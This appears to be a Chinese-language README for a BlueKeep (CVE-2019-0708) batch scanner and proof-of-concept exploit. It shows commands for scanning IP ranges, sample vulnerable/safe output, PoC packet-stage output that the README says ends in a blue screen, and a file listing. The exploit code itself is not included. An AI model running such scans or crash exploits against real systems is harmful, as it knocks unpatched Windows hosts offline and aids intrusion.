CVE-2019-0708 BlueKeep漏洞批量扫描工具和POC,暂时只有蓝屏。# CVE-2019-0708
CVE-2019-0708 BlueKeep漏洞批量扫描工具和POC,暂时只有蓝屏。
### 0x01 扫描 - windows
usage:
rdpscan.exe ip1-ip2
> .\rdpscan.exe 192.168.1.1-192.168.1.2
192.168.1.1 - VULNERABLE - CVE-2019-0708
192.168.1.2 - SAFE - CredSSP/NLA required
rdpscan.exe --file ip.txt
> .\rdpscan.exe --file ip.txt
192.168.1.1 - VULNERABLE - CVE-2019-0708
192.168.1.2 - SAFE - CredSSP/NLA required
### 0x02 POC利用
usage:
python poc.py ip 系统位数
> python .\cve-2019-0708-poc.py 192.168.1.1 32
[+] ClientData Packet Sent
[+] ChannelJoin/ErectDomain/AttachUser Sent
[+] ClientInfo Packet Sent
[+] ConfirmActive Packet Sent
[+] Session Established
[+] Vuln Should Trigger
[4.0K] /data/pocs/4a315d91ad8426cf3f38d41fc8f78ca952045364
├── [ 16K] cve-2019-0708-poc.py
├── [2.5M] libcrypto-1_1.dll
├── [605K] libssl-1_1.dll
├── [168K] rdpscan.exe
└── [ 714] README.md
0 directories, 5 files